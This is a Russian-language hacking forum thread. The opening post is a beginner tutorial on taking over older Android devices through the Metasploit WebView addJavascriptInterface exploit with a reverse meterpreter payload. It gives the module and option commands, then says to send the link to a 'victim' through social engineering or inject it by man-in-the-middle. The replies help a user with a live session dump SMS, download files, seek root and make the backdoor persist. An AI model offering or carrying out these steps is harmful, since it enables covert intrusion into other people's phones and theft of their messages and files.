• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья Android WebView Exploit(Или взлом андроида по ссылке)

<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
2 990
Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел)
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств
версии не больше (4.2.x)



Если устройства с андроидом выше версии то смотрите эту статью

И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.

И так все что нам понадобиться:
1)Запустить метасплоит
2)Выбераем наш эксплойт:
Код:
use exploit/android/browser/webview_addjavascriptinterface


3)Задаем опционально LHOST , LPORT для пейлоада,который по дефолту тот что нам нужен(android/meterpreter/reverse_tcp) URIPATH - текст ссылки который будет идти после IP ,SRVHOST и SRVPORT соотведственно IP и порт на котором будет запущен веб сервер.
set LHOST наш_ip_адрес
set LPORT наш_порт_на_котором_будем_ловить_соединение
set SRVHOST IP__наш_адрес
set URIPATH текст_ссылки
exploit -j
[/URL]
[/IMG]

4)Применяем Соц.Инженерии и даем ссылку жертве или заражаем трафик при МИТМ атаках с инжектом вредоносной ссылки...


5)Ловим метерпретер сессию



 
A

ApplePen

Я вчера заводил этот эксплоит на 4.4, Lenovo a806
 
X

xxxcrow

ребят, что то у меня ссылку не открывает
в чем проблема?
 
X

xxxcrow

Опишите более подробно свою проблему.
И было бы неплохо прикрепить скриншот проблемы.
простите, уже все нормально))
ток сейчас проблема, не могу сделать почти ничего, ни дампы не какие, не геолокацию,
мне кажется это изза того что я priv не могу поставить, говорит что такого фала нет
 
  • Нравится
Реакции: <~DarkNode~>
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
2 990
Можно предположить что неверно прописаны пути к сохраняемым дампап. Часто это может происходить когда в пути к файлу встречаются пробелы.В таких случаях нужно просто использовать символ слэша \
Путь к файлу будет выглядит примерно так:
Код:
/root/Рабочий\ Стол\sms.txt
 
X

xxxcrow

Можно предположить что неверно прописаны пути к сохраняемым дампап. Часто это может происходить когда в пути к файлу встречаются пробелы.В таких случаях нужно просто использовать символ слэша \
Путь к файлу будет выглядит примерно так:
Код:
/root/Рабочий\ Стол\sms.txt
помоему ты не правильно написал))
а еще что то по русский не писалось, и я в итоге вот так сделал, но все ровно:
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
2 990
Тогда извини)
помоему ты не правильно написал))
а еще что то по русский не писалось, и я в итоге вот так сделал, но все ровно:
Попробуй выполнить команду dump_sms с параметром -o
Код:
dump_sms -o /root/sms.txt
 
X

xxxcrow

Тогда извини)

Попробуй выполнить команду dump_sms с параметром -o
Код:
dump_sms -o /root/sms.txt
тоже самое, и так с большенством команд,
хотя все 1-в-1 делаю как в туториалах (даже как и сам создатель метасплойта(или метерпетера))
позже попробую с другим телефоном, странно что на этом не работает нормально
(могу менять файлы и прочее, а вот что то дельное нет, не местоположения ни чего остального подобного)
 
X

xxxcrow

Тогда извини)

Попробуй выполнить команду dump_sms с параметром -o
Код:
dump_sms -o /root/sms.txt
кароче, есть предположение что у метерпретера нет доступа к руту, вот что :D
как сделать? :D
и еще вопрос, как СКАЧАТЬ изображение допустим, ну на комп свой?
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
2 990
а еще как я понял, после перезагрузки все теряется? :О
Что именно понимается под словом "Все" ?
Метасплоит запущен от рута?
и еще вопрос, как СКАЧАТЬ изображение допустим, ну на комп свой?
В метерпретере есть команда download
 
X

xxxcrow

Что именно понимается под словом "Все" ?
Метасплоит запущен от рута?

В метерпретере есть команда download
метасплоит от рута, да, под словом все подрузамевается ну сессия и сам бекдор ._.

(на счет скачивания разобрался уже)))

(я даже только что выгрузил скрипт что бы рут получить для метерпретера)
 
Последнее редактирование модератором:
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
2 990
под словом все подрузамевается ну сессия и сам бекдор
Ну естественно,на сегодняшний день мне пока не известно эксплоитов в метасплоите под андроид , да и в целом, которые при эксплуатации сразу же закрепляются в системе.Как минимум это достигается различными модулями пост эксплуатации.
 
X

xxxcrow

Ну естественно,на сегодняшний день мне пока не известно эксплоитов в метасплоите под андроид , да и в целом, которые при эксплуатации сразу же закрепляются в системе.Как минимум это достигается различными модулями пост эксплуатации.
а как закрепить? (в голове только одна мысль, сделать бекдор, ток вот как его установить?)
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
2 990
Прочитай заголовок статьи, думаю логика очевидна что речь идет не про готовый эксплойт из метасплойта, а про то как создать свой бекдор с последующим бекконнектом.
Что бы достигать целей,нужно немного понимать что и как работает,а не просто один в один по мануалу делать и удивляться почему на выходе ошибка или что то не так)))
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб